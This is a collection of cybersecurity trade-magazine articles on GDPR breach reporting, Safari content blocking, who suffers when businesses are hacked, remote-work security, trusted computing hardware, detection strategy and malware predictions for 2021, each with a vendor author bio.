In the new era of cybercrime, identifying the proper sanctions and reactions for any business can seem challenging, if not confusing. When it comes to data protection and operational compliance in the digital world, authorities like the Information Commissioners Office, or ICO, have identified a sense of confusion surrounding incident management, which includes the whole process itself. The Information Commissioners Office recently revealed that nearly a third of the 500 reports of data breaches it receives weekly are unnecessary or fail to meet the minimum threshold of a GDPR personal data breach. As many operations attempt to anticipate GDPR (or compliance with the General Data Protection Regulation), there remains an unfortunate atmosphere of confusion, or misunderstanding, when it comes to appropriate incident management under data protection regulation. Operations seem to struggle with the types of incidents or breaches that should be officially reported under GDPR. It is understood that ‘over-reporting’ is the most common reaction to perceived breaches. Whilst this is largely motivated by a desire for operational transparency and good compliance practice, clearing up misconceptions surrounding GDPR and data breaches can help businesses remain competitive by avoiding risky or costly penalties.

Identifying personal data breaches Over reporting is not a strategy as much as it is a scattered reaction to a data breach. Under GDPR compliance, which is far-reaching across European territories and beyond, there is a new urgency to officially report compromises that might upset data protection within your organisation. It is also considerably more important than a mere courtesy to your employees, but an attempt to strictly regulate the collection, movement, and storage of personal information, which is why it is most often a challenge to companies with access to larger amounts of data. Defined under the General Data Protection Regulation, a personal breach can be understood as a “breach of security leading to the accidental or unlawful destruction, loss, alteration, unauthorised disclosure of, or access to, personal data transmitted, stored or otherwise processed” (captured in Article 4, definition 12). Importantly, not all ‘breaches’ are equal in severity and, therefore, not every incident needs to be officially captured and reported. Any compromise that falls outside of the definition, according to GDPR compliance, or where the severity is limited, then action isn’t necessarily required. The goal for businesses should be clarifying whether action is officially required or not. But how does this look in everyday practice? It is always advisable to evaluate incidents and cases individually, determining the next actions based on the severity of each breach. Some breaches may affect or inconvenience the role of a single employee, whereas other, larger compromises can impact the emotional, physical, or financial lives of many. Any business that suffers a breach should plan to formally document what happened and any next actions, including whether it was reported or if it failed to meet the criteria. This can help businesses in the scenario that a decision is challenged.

How soon should a breach be reported? All businesses are responsible for identifying, and responding to, breaches under data protection. Not only should businesses aim to have the right controls in place to promptly detect a breach, but they should report any compromises within 72 hours to the supervisory authority (which is summarised in Article 33). One of the most common misconceptions about compliance with GDPR is that this mandatory reporting period accounts for 72 “working” hours – whereas, a breach should be captured within 72 hours from the moment of discovery. Where employees or the public might be involved by unauthorised data breaches, those affected should be appropriately notified. In certain scenarios, a business may even need to release a press statement. This will allow those affected parties an opportunity to take precautions and guard themselves from any fallout.

What needs to be officially reported? Compliance requires expertise. And failures, delays, or inaccuracies when businesses respond to the ICO’s request for information is increasingly common. Preparing for incident management within your organisation means understanding your responsibilities when a breach is detected and how it needs to be managed – including documenting actions.

Refer to the ICO’s data breach reporting assessment for the kinds of information required following a breach and the depth expected from your investigation. The ICO expects every business to demonstrate the depth and breadth of their investigation by responding to everything from breach discovery to management of its effects. Failure to respond properly to data breaches, under the GDPR, can result in heavy fines and penalties. The role of data protection cannot be underestimated, both in how your company plans to prevent breaches and how it will manage any future ones. Compliance with GDPR, even though commonly misunderstood, can define how your operation does business in the markets under data protection governance.

About the Author Dan May is the Commercial Director at ramsac, providing secure, resilient IT management, cybersecurity, 24-hour support, and IT strategy to growing businesses in London and the South East.

Brave New World: Safari Content Blocking By Andrey Meshkov, CEO and CTO at AdGuard

● Content blocking is not a priority for Apple and WebKit. ● Content blocking in Safari is possible despite all its issues and limitations. ● If we want to improve it, we need to contribute to WebKit ourselves.

This article is about content blocking on Apple platforms, mainly iOS. Why is it important to talk about Apple? First of all, it's Apple, and it enjoys a large enough market share that many users will be affected by its content blocking capabilities (or lack thereof). Secondly, Manifest v3 is coming to Chromium, and half of the tech problems in Chromium have been solved, unlike Safari. There are a lot of similarities between the two, so we’ve been able to draw some conclusions about where Safari is falling behind. In this article, we’ll go over the content blocking methods available on iOS, and see how to get around the limitations when possible.

Content blocking in general: System-wide filtering There are only two options for content blocking: System-wide filtering and Safari Content Blocking. System-wide filtering is not as widespread as Safari Content Blocking for a number of reasons. However, it’s the only way you can go beyond Safari and do content blocking in other apps and browsers. Furthermore, System-wide filtering actually was possible even before Safari Content Blocking was introduced in 2015. One of the first content blockers on the App Store, in fact, was quite a popular app called WeBlock, which did system-wide filtering. All System-wide filtering methods are based on NEVPNManager API. Using a local tunnel, the app can filter DNS, use a PAC file to block requests, scan SNI, or even intercept TLS. You can have all these in your app, but unfortunately nothing comes without downsides. There are techniques to bypass DNS filtering and PAC files, and there are also some technical limitations. For example, there’s a strict memory limit that iOS imposes on VPN tunnel processes, and it will kill any process that uses over 15MB RAM.

The App Store may not be consistent with Apple’s rules The App Store Guidelines, Section 5.4, VPN Apps, states: “Parental control, content blocking, and security apps, among others, from approved providers may also use the NEVPNManager API.” Вut still, there are no guarantees that your app will be allowed on the App Store.

We at AdGuard have a sad history with the App Store. Everything was great back in 2015 when we launched the app, but then in 2018, Apple suddenly decided to ban all apps that did system-wide filtering. We even had to discontinue our AdGuard Pro app after that. Then after a year or so, they changed their decision again and the guidelines now contain an exemption specifically for parental control, content blocking and security apps. So we were back in business, the app was approved, and we started working on a major update, new features, and other cool stuff. In the beginning of 2020, we uploaded a major update and it was rejected again with pretty much the same wording as they had used two years before. The reviewer told me over the phone that it wasn’t his decision; they had gathered a committee that decided that they didn’t want to have a system-wide filtering app on the App Store. So in order to pass the review, we had to make some rather drastic changes to the app, go through the App Store appeal process and review board, and only then was it approved. At the same time, I see multiple apps that do very similar things to the ones that we weren’t allowed to, and nothing happens to them. This shows that an app may pass the review process, but some time later, another committee may kick the app out of the App Store—or it might never happen.

The Safari Content Blocking API has issues and limitations... In contrast to system-wide filtering, there’s no controversy about Safari Content Blocking: it’s definitely allowed, and it’s safe to make an app that does it—but nothing good comes without complications, so let's see the issues and limitations of this API. Fortunately some of them can be solved; maybe not fully, but to an extent. Safari Content Blocking comes with no debugging tools for debugging content blocking. The only tool that’s available is the browser Console, where you can see which requests were blocked, but from the Console output it’s impossible to understand what rule is blocking those requests. Figuring it out can be an annoying, time-consuming process.

AdGuard, EasyList and uBlock filters are based on the original Adblock Plus “core” syntax. It has since been extended, but the “core” part of it is the same among all popular content blockers. Safari Content Blocking rules have nothing in common with this syntax, which is a problem because we don't want to create special Safari-only filter lists. Also, Safari just doesn’t provide tools for that. What we want is to use the good old traditional filter lists like AdGuard and EasyList. For now, we’re using a real-time approach right on the device to automatically convert our rules into Safari Content Blocking rules for the AdGuard apps. This way we can convert about 90% of all Easylist & AdGuard filters so they’ll work on iOS.

...And slow compiling... This point is actually pretty massive, because it’s the reason for some other limitations. Safari compiles every content blocker’s JSON file into a “prefix tree,” and the process is quite slow. For example, it takes over two seconds on a new MacBook Pro to compile a JSON with just a little over 30K rules. Compared to content blockers on other platforms, it takes less than a second for the AdGuard Android app to parse and compile a list with over 100K rules. The obvious difference, though, is that our Android app uses a different syntax which is not as complicated as regular expressions; perhaps it’s not that flexible, but it’s specifically optimized for matching URLs. It’s easy to explain the next limitation. A single content blocker cannot contain more than 50K rules, and that’s a hard-coded limit. We contacted the developers of WebKit (the browser engine behind Safari), and they told us that the main reason for this limitation is how slow the compiling process is. They may increase it a little bit because new devices are faster, but that won’t magically solve all our problems. There’s no room for a substantial improvement as long as the rules are based on using regular expressions. This limitation itself is a major problem. AdGuard Base filters + EasyList have 100K rules in total and simply do not fit within the limit.

There are a couple of things to do in order to solve this issue. We can convert our rules to Safari Content Blocking rules now, but we also need some more modifications to make the resulting list as short as possible. One of the things we do is combine similar element-hiding rules into a single rule. This helps a lot, but it’s still not enough. Another thing that we do is remove obsolete or rarely used rules from the filter lists that we use in Safari. So in order to solve this sort of issue, filter list maintainers can use special “hints” to exempt rules from the “optimization” process. But that’s not all. Now, we come to the issue of multiple content blockers. AdGuard registers SIX content blockers for Safari, and the user is supposed to enable them all. So, does six content blockers actually mean that the limit is now 6 x 50K = 300K rules? Yes and no; it’s just not that simple. The problem is that these content blockers are completely independent, and the rules in them can’t influence each other. If one content blocker decides that a URL should be blocked, the other ones can’t undo that decision. Or, if one content blocker decides that some page element should be blocked, it will be blocked; the others can do nothing about it. But that’s not how it works in real life on other platforms. Different filter lists are supposed to interact with each other; a good example is EasyList supplementary language-specific lists: they may fix issues on some local websites.

...And slow development This is basically the full list of changes implemented in Safari Content Blocking: ● 2015 - Safari Content Blocking is implemented ● 2016 - Added one new feature (make-https) and a couple of major bugs were fixed ● 2017 - Added one more new feature (if-top-url) which is pretty useless, if you ask me, added content blockers to WKWebView, and fixed a couple of bugs Then it drastically slows down… ● 2018 - fixed a couple of bugs, refactoring ● 2019 - fixed a couple of bugs ● 2020 - no significant changes so far

This year, we and Cliqz, Brave, Adblock Plus and some other developers wrote an open letter and compiled a list of the most pressing issues. Regardless of the severity of those issues, it doesn’t mean that the WebKit developers are undermining content blockers. To us, it just seems like it’s not a priority for them, or maybe they have limited resources, or both.

Do it yourself!

Regardless of the reasons behind WebKit’s laxness, it seems the only option we have is to do it ourselves, since content blocking remains a priority to us. WebKit is open source and they are open to contributions, so that seems like a good way forward. We may want to start with a proposal or a detailed specification of the changes we would like to implement in WebKit and see if it gets approved. I hope it does, and then we can implement it ourselves.

About the Author Andrey Meshkov is a co-founder and CTO of AdGuard ad blocker. He's been working in IT for over 15 years and has accumulated tons of experience not just in his primary work area, but also in related ones, such as online privacy concerns. Sometimes the urge to share his thoughts becomes too unbearable and he takes a break from coding to write an article or two. First Name can be reached online at (https://twitter.com/ay_meshkov/) and at our company website http://www.mycompany.com/

When Businesses Get Hacked- Who Are the Victims? This article looks into who the victims are when an organisation comes under attack. By Nicole Allen, Marketing Executive, SaltDNA.

Cyber-attacks occur every two and a half minutes, according to Government statistics, which is why ensuring that your company is protected and secure is critical. Threats can come in several different forms that vary depending on their severity. Hackers are deliberately trying to inflict damage in order to persuade employees to make one mistake which could allow them access into everything they need. The question is not "Which sectors are targeted the most?", as much as,”which sectors are the most likely to suffer the greatest loss as a result of a cyber attack?" Today's cyber criminals are not a homogeneous group. There are hackers who spend months at a time attempting to extract data and funds from a single company, and there are others who threaten hundreds of companies with phishing emails and other techniques, hoping to get a handful of curious workers to click on a mass email attachment and then extort money with a DDOS attack. These strategies result in their attack continually moving onto a new fresh batch of victims. So who are the victims of these attacks and how are they affected?

Employees: The repercussions of cyber attacks are felt by companies across the globe. The global economy has lost 5.2 trillion dollars over the past five years. Cyber attacks, however, go way beyond financial losses. A Kaspersky survey confirms that 31% of cyber attacks lead to job losses due to employees being involved with exposed customer data. According to the Data Security Breaches Report, 32% of all

organisations have reported cybersecurity breaches over the last 12 months. The method of attack varies, but well known examples are as follows: 80% of attacks are phishing attacks 28% is hackers impersonating an individual via emails or online 27% are ransomware attacks when businesses come under threat. These attacks all take advantage of employees and pose major threats to companies. A strong security plan must include sufficient controls to maintain a basic level of security and a tracking system to investigate attempts to breach the policy, which should be accompanied by training for all employees. When it comes to defending themselves from cyber attacks, many businesses fail to recognise that their people are as important as the cyber tools which they deploy. There are a variety of low-tech tactics used by hackers to take advantage of employees. Such tactics include: baiting, unsubscribe buttons, social engineering, keylogger and internal threats. It is in the best interests of all companies to guarantee that their workers have all the expertise, knowledge and skills they need to help protect the company and themselves from catastrophic cyber attacks and data breaches. This means ongoing education and training, with the active participation of the IT department of the organisation. All employees in the workforce should receive training to understand data processing, security, secure communications and disposal best practises from the moment they start with the organisation. It is not appropriate to underestimate the danger of cybersecurity threats, and it is up to employers to ensure that their workers have the resources required to ensure their business data is secure at all times.

Business Owners: A successful cyber attack will cause your organisation to suffer significant harm. It can impact your bottom line, as well as the customer confidence of your brand. It is possible to narrowly divide the effect of a security breach into three different categories: financial, reputational and legal. Cyber attacks can cause devastating consequences to a company, almost to the point where it could shut a business down. A 2018 IBM study looked at 477 companies from 15 countries that had suffered some form of data breach and asked them how the organisation was impacted by these cyber-incidents. From this study, the healthcare sector was by far the most vulnerable in terms of overall damages from a hack. In fact, this sector registered average costs of more than $400 per compromised customer record. Financial services, at just over $200 a record, was a distant second. The financial loss usually is caused by corporate identity theft, financial information theft (e.g. bank data or credit card data), money theft, trade interruption (e.g. failure to carry out online transactions) or loss of trade or contract. Trust is an integral element of the relationship between customers and businesses. Cyber attacks can harm the credibility of your organisation and erode the trust your clients have in you. In turn, this could potentially lead to: customer loss, loss of sales and a drop in earnings. The effect of reputational harm may also affect your suppliers, or affect the relationships you might have with your company's partners, investors and other third parties. From a legal standpoint, data protection and privacy laws expect you to manage the security of all personal data owned by you, whether it be your employees or your clients. You can face fines and regulatory penalties if this information is unintentionally or purposely breached as a result of the company

failing to enforce adequate security measures. British Airways is a prime example of this having been fined £20 million for a data breach which affected more than 400,000 of their customers.

Customers: Cyber attacks are more likely to occur as cybercrime becomes more profitable. The short-term and long- term impact that cyber attacks could have on your organisation are important to understand. Similarly to the business owners having their reputation negatively affected, customers' perception of the company will change for the worst. According to Forbes Insight report, 46% of organisations were found to have suffered damage to their reputations and brand value as a result of a data breach. In other words, once the public sees an organisation in a bad light, its reputation is almost impossible to fix. Just ask Toyota, or any of the other brands that have suffered a data breach Tesla, or Hancock Health, are just about the worst light to be in. Lawsuits and fines are other long-term consequences that affect business’, there has been a huge increase in class action lawsuits in both the US and UK as victims seek monetary compensation for the loss of customers data. When cyber attacks leak large quantities of personal information, civil lawsuits are common. Sometimes, these cases take years and are costly to resolve. According to a report by security firm Norton, 978 million people in 20 countries lost money to cybercrime in 2017. How can you prevent your business from falling victim to a cyber attack? Even the most robust of organisations can be affected by data breaches. Managing the risks accordingly is very important. An efficient cybersecurity incident response plan and secure communications platform will assist you in preventing an attack from occurring in the first place, but also elevate pain when having to manage potential incidents when they do arise. If you're still reading, you will be very aware you're vulnerable to cyber crime. It is the new normal for all sizes of businesses, big or small. Media reports concentrate on corporate mega attacks and breaches, but small businesses are the new frontier for cyber criminals, as discussed earlier. At SaltDNA we work with organisations across the world of all sizes to enable them to have secure, confidential conversations wherever they are, at any time. Your best bet to ensure that the possibility of a cyber attack never becomes your reality is to enforce a secure communications platform alongside a comprehensive and ongoing employee education on cyber security. For more information on this article, sign up for a free trial or to talk to a member of the SaltDNA team, please contact us on [email protected].

About SaltDNA SaltDNA is a multi-award winning cyber security company providing a fully enterprise-managed software solution giving absolute privacy in mobile communications. It is easy to deploy and uses multi-layered encryption techniques to meet the highest of security standards. SaltDNA offers ‘Peace of Mind’ for Organisations who value their privacy, by giving them complete control and secure communications, to protect their trusted relationships and stay safe. SaltDNA is headquartered in Belfast, N. Ireland, for more information visit SaltDNA.

About the Author Nicole Allen, Marketing Executive at SaltDNA. Nicole completed her university placement year with SaltDNA, as part of her degree studying Communication, Advertising and Marketing at University of Ulster. Nicole worked alongside her degree part time during her final year and recently started full time with the company having completed her placement year with SaltDNA in 2018/19.

Nicole can be reached online at (LINKEDIN, TWITTER or by emailing [email protected]) and at our company website https://saltdna.com/.

Security and Remote Management: What Is the Market Looking Like as We Head Towards 2021? By Gil Pekelamn, CEO, Atera

For many IT professionals and managed service providers (MSPs), remote management has always been part of the deal. Especially in this generation’s global economy, service providers are not always local to their clients, and it is much more efficient and effective to be able to support customers from afar. The big difference since the COVID-19 pandemic hit the headlines, is that employees are now working from home, which is a whole different ball game to managing anyone working from an office environment. Instead of managing a centralized location, there are now multiple remote offices - all with different needs and security set-ups.

When working from home, employees are much more likely to be using personal devices, or shared computers, and yet they are still accessing sensitive customer information, much of which is governed by compliance regulations. Home networks are less secure than office networks, with weaker protocols in place. A single vulnerability could bring a whole network down, compromising an entire company.

A Checklist for Remote Management of Home Workers

With many companies already extending WFH policies to continue through to Q2 of 2021, and maybe even longer, and the FBI reporting a 400% increase in cybercrime since the start of the pandemic, security procedures are still more important than ever.

It’s therefore essential that security teams up their game. Here are 5 top tips for IT professionals looking to secure their employee or client remote environments, and better educate end-users about working from home:

1. Educate Against Phishing Threats: Nearly all cyberattacks come from a malicious link or attachment, which can only be effective if an employee falls for the scam. Keep your employees up to date on the latest threats, which sadly, at the moment, are leveraging fear around COVID- 19, such as promising a vaccine or suggesting you have been in contact with someone that has tested positive.

2. Don’t Forget Patch Management: Patched software is secure software, so whatever your process, make sure that no employees are running old versions or even end of life software at home. The best technology partners will allow you to automate the install and update of your software via vendors such as Chocolatey or Homebrew, so that you’re never behind the times.

3. Think Home Network Vulnerabilities: You may need to think a little out of the box when it comes to protecting home networks. For example, how secure are your employee’s router settings, and what smart devices do they have which are connected to the home network? Take a thorough inventory of all connected devices, and start from there.

4. Multi-Layered is the New Secure: There’s no such thing as a silver bullet for enterprise security anymore, so your best bet is a layered approach to cybersecurity. This might start with user education for example, followed by URL or script blocking, and then file scanning and integrity monitoring, and so on. Even if an attacker gets through one line of defense, the next is ready and waiting.

5. Have a Disaster Recovery Plan: If all else fails, a robust disaster recovery plan will mean you can get back up and running as quickly as possible. Include a plan for business continuity, protecting sensitive information, minimizing financial loss and disruption to end-users, and an incident response plan to remain compliant with any relevant regulations.Make sure that your technology and service providers recognize the importance of securing this kind of unknown environment.

Looking Ahead to 2021, and Beyond

At the moment, none of us know what ‘the new normal’ is going to look like. For some, working from home will become commonplace, while others might move to a more hybrid way of working, some days from the office, some from home. We do know that organizations won’t want to risk being caught short again, struggling to securely manage at the same time as ensuring business continuity.

This signals a real change in mindset for today’s IT professionals. Many companies historically saw IT as a cost, rather than an investment. They couldn’t see the value in having IT support managing operations proactively, preferring to hope for the best and call in an expert if and when something needed attention, on a break-fix model. The pandemic has changed that, showing business stakeholders that they can’t afford to be unprepared, and that they need a proactive approach to managing both IT and security.

The important thing when targeting this investment, will be to ensure that security plays well with the rest of an organization’s IT ecosystem, whether that’s integrated in their professional services automation such as helpdesk software, or their remote management and maintenance, like remote access technology for example. If security is reliant on employee behavior or on multiple additional steps or vendor solutions, you’re going to struggle to ensure that you don’t have gaps.

If, on the other hand, security comes as part of a package deal, you don’t need to rely on employee or customer education alone. Think about software updates and patching that happen automatically without any impact on your business operations. Consider a backup solution that is working silently and effectively in the background. Onboard 2FA as part of the deal for employees from day one. Altogether, you’re creating a much more resilient and robust environment in which to work.

About the Author

Gil Pekelman is the CEO and Founder of Atera. Under Gil’s leadership, Atera has grown into the most innovative, industry leading platform for MSPs both large and small. Prior to founding Atera, Gil held senior positions at Indigo NV, (now a division of HP) and Exanet (acquired by DELL). He has a degree in Economics and Management from Tel-Aviv University and is the sole inventor of three patents. https://www.atera.com/

Working from Home? You’re Not Alone The rise of cyber hacks in an age of remote working – and how to prevent them By Steve Hanna, Embedded Systems Work Group Co-Chair at Trusted Computing Group (TCG) and Jun Takei, Japan Regional Forum Co-Chair at Trusted Computing Group

Technology is replacing a number of real-life activities, helping to maintain a level of normalcy and connection with familiar faces amid unprecedented times. As remote working continues to prove an ever- essential trend in light of our current global climate, organizational networks have expanded from single offices to cross-country residential spaces, from kitchens to spare rooms. In fact, according to global tech market advisory firm ABI Research, Connected Home devices are expected to become more popular in the coming months, with a 30% year-on-year sales increase projected, with more than 21 billion Internet of Things (IoT) devices expected by 2025. Cloud services have also been adopted at an increasing rate by organizations to deliver remote services and, with 84 percent of enterprises now running on a multi-cloud strategy, is expected to account for 70 percent of tech spending this year. As a result, collaboration tools, including various video conferencing platforms, are being used far more frequently as companies adjust to the new normal of telework. Meanwhile, social media and video calling services such as FaceTime are allowing families and friends to stay connected and streaming services are providing entertainment on a more personal level. This new normal brings with it changed user habits and, with inadequate security protection on these devices, an increased level of risk in the form of new unknowns such as hacked devices and distributed denial of service attacks. Connected Home and other IoT disrupts our traditional methods of business, acting as a bridge between the virtual and physical world and offering new, almost limitless benefit for

workforces and education. However, at the same time, it also increases the number of opportunities available to hackers that have never been possible before; remote work is a game changer for society, bringing huge benefit, but it is crucial that we also understand the risks. Faced with a more integrated and widespread network, security protection against business email compromise, data thefts and scams is something that all organizations and users must implement. As a result, it is critical that organizations invest in collaborative tools to enable remote workers to do their jobs securely whilst adhering to protective stay-at-home initiatives worldwide.

It Starts at Home Working from home presents a communication barrier between employees, preventing instant, in-person discussions about suspicious digital activity that they may observe, for example an unusual email. The only current replacement of these face-to-face discussions is virtual conference calls – another popular security oversight and target for attackers. However, while this face-to-face communication is important, it is not essential to security protection measures, given that the correct automated detection and prevention security mechanisms are put in place. To successfully protect these avenues of online correspondence, it is vital that organizations work to become more security-conscious, starting with the user and their awareness of attacker behavior. Such measures can be difficult due to the added distractions faced by workers at home, including childcare and deadline pressures, among other things. From a technical perspective, the home network should not be trusted as it brings new vulnerabilities and is unable to support devices in the same way a corporate business network would, making a Virtual Private Network (VPN) essential. In some cases, a home PC may be used for other purposes by other members of the family, or an employee may want to use their personal device to access corporate information, for example with a work USB. This misuse not only provides opportunities for information hacking within the network, but also physically exposes devices to threats. Such technical risks, combined with the rushed and unpredictable nature of home working, presents a wide range of vulnerabilities that hackers can take advantage of as they get ever smarter. However, it is not enough to advise employees as to the correct device and data conduct at home; organizations need to go beyond this to accept the given risks and implement the appropriate protection mechanisms. To prevent device protection from being overlooked amid the irregularity of working from home, organizations should consider investing in training for remote workers to increase user awareness or more thorough backup systems. These can be crucial for safe, efficient and secure business operations, as well as helpful for maintaining normalcy. Preventative measures can also be taken on an administrative level, especially during video conferencing over collaboration platforms. For example, using unique access codes for each meeting, enabling a waiting room to keep track of meeting participants and limiting shared screen options within the meeting, privacy can be protected. By having the knowledge to put basic security measures in place, question browser pop ups and access a backup system if things become corrupted, organizational breaches – and breakages – can be prevented.

Securing Devices from the Inside, Out With many countries having passed the peak of the COVID-19 pandemic, it is expected that this ‘new normal’ will continue far into our future, meaning that the demand for remote device security is not likely to wane. In answer to this search for long-term, full-coverage protection, Trusted Computing Group (TCG)

has been working to develop device security which protects against these new-found risks that have come with our “new normal” from the inside. Offering agility and fast deployment, Trusted Computing ensures multi-layered security to safeguard corporate confidential information and personal data against the growing sophistication of interception and threats in the realm of remote working, not only within PCs but also among IoT and cloud-connected devices and networks. Such solutions come in the form of hardware-based, embedded security subsystems, such as the Trusted Platform Module (TPM). When implemented, these chips create a reliable trust relationship between interconnected devices, protecting against cyberthreats. Their cost-effective nature enables organizations to affordably protect entire networks of devices, securing systems thoroughly and efficiently. TCG specifications are needed to collaborate with government guidelines for a safer- connected future. This includes not only internal components such as the TPM, but also the use of security reinforcing authentication mechanisms, such as multi-factor authentication or longer passwords. Within a network, it is also encouraged to use device provisioning, ensure strong user authentication mechanisms, employ PKI based certification and conceal the whole system via a hardware-based root- of-trust. Many of these measures are already available for use in commercial entities and government digital infrastructures and are recommended for full-coverage data protection. COVID-19 has significantly impacted society, having pushed Digital Transformation (DX) in many places all over the world. Where working from home was not previously standard practice before the pandemic, many organizations now see it as the future of business, education and collaboration. However, while DX has been long-awaited among society, we must simultaneously implement the appropriate security protection measures in order to realise its full benefit, and more must be done to create this safe and secure digital ecosystem. The nature of technology, and therefore cybersecurity, is that it is ever- changing; as devices advance, so do threats. Organizations, having implemented the current recommended measures, must ensure they remain vigilant and keep systems, software and backups updated for the ultimate protection. To do so, the integrity of the network endpoints needs to be measured and constantly monitored to avoid endpoint compromises. In adapting to our new normal and changing environment, it is vital that we adjust to the new technology challenges rapidly and proactively. By employing this security-first approach and building on these essential principals of updating, protection and resilience, billions of IoT and cloud systems will benefit, providing a safe, secure future despite a growing cybersecurity risk in our increasingly connected world.

About the Authors Steve Hanna is the co-chair of the Embedded Systems Work Group in the Trusted Computing Group (TCG) and Senior Principal at Infineon Technologies. Hanna is a member of the Security Area Directorate in the Internet Engineering Task Force, also serving as the liaison from the TCG to the Industrial Internet Consortium. He is the author of several IETF and TCG standards and published papers, an inventor or co-inventor on 47 issued U.S. patents, and a regular speaker at industry events. He holds a Bachelor’s degree in Computer Science from Harvard University. Steve Hanna can be reached online at [email protected] and at our company website: https://trustedcomputinggroup.org/.

Jun Takei is the co-chair of the Japan Regional Forum in the Trusted Computing Group and is a Principle Engineer in Intel. Since joining Intel, he has been responsible for technology policy and standards, and has a wealth of experience in the Internet and wireless communications from both a technology and policy point of view. From 2004 to 2015, he was a board member of the one of the most successful Internet research consortiums, the WIDE project, and has also spent time lecturing at Keio University. Now, he is working as the director of Security and Trust Policy in Intel. Jun can be reached online at [email protected] and at our company website: https://trustedcomputinggroup.org/.

The Best Network Protection: Go Deep or Go Broad? Combining Breadth and Depth Brings Full Protection By Albert Zhichun Li, Chief Scientist, Stellar Cyber

Almost since the beginning of network security, vendors and practitioners have wrestled with choices between going deep and going broad for their security solutions. Mostly, the choice varies between predominantly one or the other. Going deep typically means careful monitoring and analysis of certain types of threats or behaviors at the cost of not examining a much broader range of activity. Solutions that are broader may lack the clarity and fidelity to make fast, accurate alerting. They also may miss important indicators.

The battle to protect data, systems, users and networks has been far from easy. Today, a more interesting headline might announce when a data breach has not occurred. The odds are heavily in favor of attackers to penetrate a network and have free rein to engage in theft or damage. These high-value attacks are human-run and employ multiple approaches over a period of time. The now commonly acknowledged north, south, east and west type of activities work for an attacker to systematically, and sometimes serendipitously, accomplish their mission. One step, such as reconnaissance through some kind of scanning, will lead to a next and a next. This reality means that both depth and breadth are important if an organization has any hope of curtailing an attack.

As solutions for eXtended Detection and Response (XDR)—and perhaps other categories of solutions— emerge, one of the more important questions they will have to face is this ongoing one between depth and breadth. Depth and breadth can work together to ensure higher fidelity alerts with a low number of false positives. The ability to understand potential attacker activity with detail as well as context can make all the difference in flagging something that is truly important. To be productive, activities must be identified that are both abnormal and malicious.

Breadth is important since attackers use multiple tactics, largely sequentially. The ability to see the connectedness between events gives security groups a substantial advantage. This “seeing the forest for the trees” can identify something that might otherwise be missed or provide the fidelity to prevent “crying wolf” too many times. Breadth can also unify the strength of individual security solutions, each with its own area of expertise and specialization.

Depth brings important details and may answer a number of the “who, what, where, when, how” questions. EDR systems, for instance, are best at understanding endpoint activity, CASB solutions are primed to make sense of certain cloud activities. UEBA tools help examine who did what on the network.

Of course, it is simply not possible that one tool or system can do everything with full expertise and precision. This is why the idea of not only integrating but also aggregating key findings from a myriad of tools is so powerful. Sharing “the best of” from each system ensures that the whole is more valuable than sum of the parts. In this way, breadth and depth can combine and work together to minimize any tradeoffs of design to produce better results.

Breadth should also work to fill any gaps between detections provided by various systems that might exist. Usually this means gaps in scope, but sometimes it might mean limitations or delays in what data is provided by a security system and when. Sensors can help fill this gap that inevitably exists. Logs may also provide supplemental information, but they generally cannot be depended on for timely insights and may be limited in what is captured. They can also be manipulated.

Depth and breadth are good things, and vendors and practitioners should continue to build expertise in both areas. Still, to gain an upper hand against attackers, organizations cannot afford to choose between the two. Uniting these two dimensions will help even the odds.

About the Author Albert Zhichun Li is the Chief Scientist at Stellar Cyber. He is a world- renowned expert in cyber security, machine learning (ML), systems, networking and IoT. He is one of the few scientists known to heavily apply ML to security detection/investigation. Albert has 20 years of experience in security, and has been applying machine learning to security for 15 years. Previously, he was the head of NEC Labs’ computer security department, where he initiated, architected and commercialized NEC’s own AI-driven security platform. He has filed 48 US patents and has published nearly 50 seminal research papers. Dr. Li has a Ph.D. in system and network security from Northwestern University and a B.Sc. from Tsinghua University. Albert can be reached online at [email protected] and at our company website http://stellarcyber.ai

Cybersecurity Predictions For 2021 Preparing for the “next normal” By Topher Tebow, Cybersecurity Analyst (Malware), Acronis

For cybersecurity professionals, this year began more or less like any other. Fast forward to April, and nearly half of the American workforce was working from home — relying on remote access tools and cloud services for everyday business needs. It’s been a time of great challenges and opportunities. We’ve finally settled into the “new normal,” but cyberthreats continue to evolve and respond to the new environment. As we look forward to 2021, here are a few of our cybersecurity predictions:

1. Attackers will continue targeting remote workers It goes without saying that the COVID-19 pandemic has fundamentally changed how business is done these days. Ninety-two percent of global organizations adopted new IT technologies this year, driven by the need to enable or expand their remote operations. Work-from-anywhere is the new normal, and with that comes a new IT infrastructure — and myriad associated security and privacy risks. Companies have rushed to integrate new tools and services for collaboration and remote access, but often lack the time to thoroughly vet these solutions — or the budget to work with tested vendors, and to properly train IT staff. Countless organizations are currently using misconfigured solutions (or ones that are simply of dubious quality), and are at elevated risk as a result.

2. Threats against MSPs, cloud services, and businesses will rise With data accessibility at the center of everyday business operations — and remote access and collaborative features more necessary than ever — IT services are a requirement for every organization. Small and medium businesses are particularly reliant on managed service providers (MSPs) to fulfill this need. We’re already seeing an increase in attacks against MSPs and cloud service providers — no surprise, given their status as a prime attack target. Successfully compromising a service provider is a far more efficient prospect than targeting individual businesses, as it allows cybercriminals access to the provider’s entire customer base in one fell swoop. Expect to see this trend continue.

3. Data exfiltration will become a bigger threat than encryption While we expect ransomware to hold its position as the number-one cyberthreat to businesses in 2021, the structure of these threats is shifting. In the near future, we expect that stealing sensitive data — rather than simply encrypting it on infected systems — will be the primary form that ransomware strikes take. Cybercriminals seek to monetize every attack, and recent trends have demonstrated that exfiltrating data greatly increases the odds of successfully negotiating a ransom demand. The prospect of having sensitive data — like trade secrets or personally-identifiable customer and employee information — sold or publicly released adds tremendous pressure to companies and government entities. Data protection and data loss prevention solutions will be particularly important in the coming year.

4. Automation and personalization will cause malware samples to skyrocket Advances in computing power and artificial intelligence are kicking the malware development cycle into overdrive. Cybercriminals can build and iterate new cyberthreats with dizzying speed, sending out waves of attacks and using the results to shape their next variants. In addition, these threats are increasingly personalized — purpose-built for their targets using information mined from corporate websites and social media profiles. As spear-phishing campaigns have shown time and again, those who make the effort to tailor attacks in this way are often rewarded with an increased success rate. The industrialization of malware and social engineering campaigns poses a significant threat to modern businesses. The average lifetime of a malware sample is now down to a mere 3.4 days, severely hampering the effectiveness of signature-based detection. Now more than ever, it’s critical for organizations to invest in complete cyber protection solutions that can effectively detect and block both known and unknown cyberthreats.

